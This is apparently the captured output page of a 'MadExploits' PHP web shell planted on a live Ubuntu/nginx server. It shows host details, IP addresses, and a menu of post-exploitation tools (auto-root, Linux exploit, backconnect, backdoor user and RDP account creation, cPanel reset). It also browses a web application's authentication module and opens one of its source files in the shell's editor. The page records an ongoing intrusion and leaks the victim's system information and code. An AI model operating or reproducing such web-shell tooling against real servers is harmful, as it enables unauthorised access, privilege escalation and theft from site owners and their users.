Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
app /
Modules /
Auth /
DTO /
[ HOME SHELL ]
Name
Size
Permission
Action
AccountDTO.php
1.07
KB
-rw-rw-r--
AccountUserDTO.php
2.46
KB
-rw-rw-r--
GetAccountDTO.php
559
B
-rw-rw-r--
LoggedUserDTO.php
1.69
KB
-rw-rw-r--
LoginDTO.php
862
B
-rw-rw-r--
SelectAccountDTO.php
1.3
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AccountDTO.php
<?php namespace App\Modules\Auth\DTO; use Spatie\DataTransferObject\DataTransferObject; class AccountDTO extends DataTransferObject { public int $id; public string $uuid; public ?string $company_name = null; public ?string $company_email = null; public string $logo_path; /** * @param accounts[] $data * @return AccountDTO */ public static function collection($data) { return $data->map(function($item, $key) { return self::toJsonResponse($item); }); } /** * Transform the resource into an array. * * @param accounts{} $params * @return array */ public static function toJsonResponse($params) { return new self([ 'id' => $params->id, 'uuid' => $params->uuid, 'company_name' => $params->company_name, 'company_email' => $params->company_email, 'logo_path' => $params->logo_path, // 'created_at' => $params->created_at, // 'updated_at' => $params->updated_at, ]); } }
Close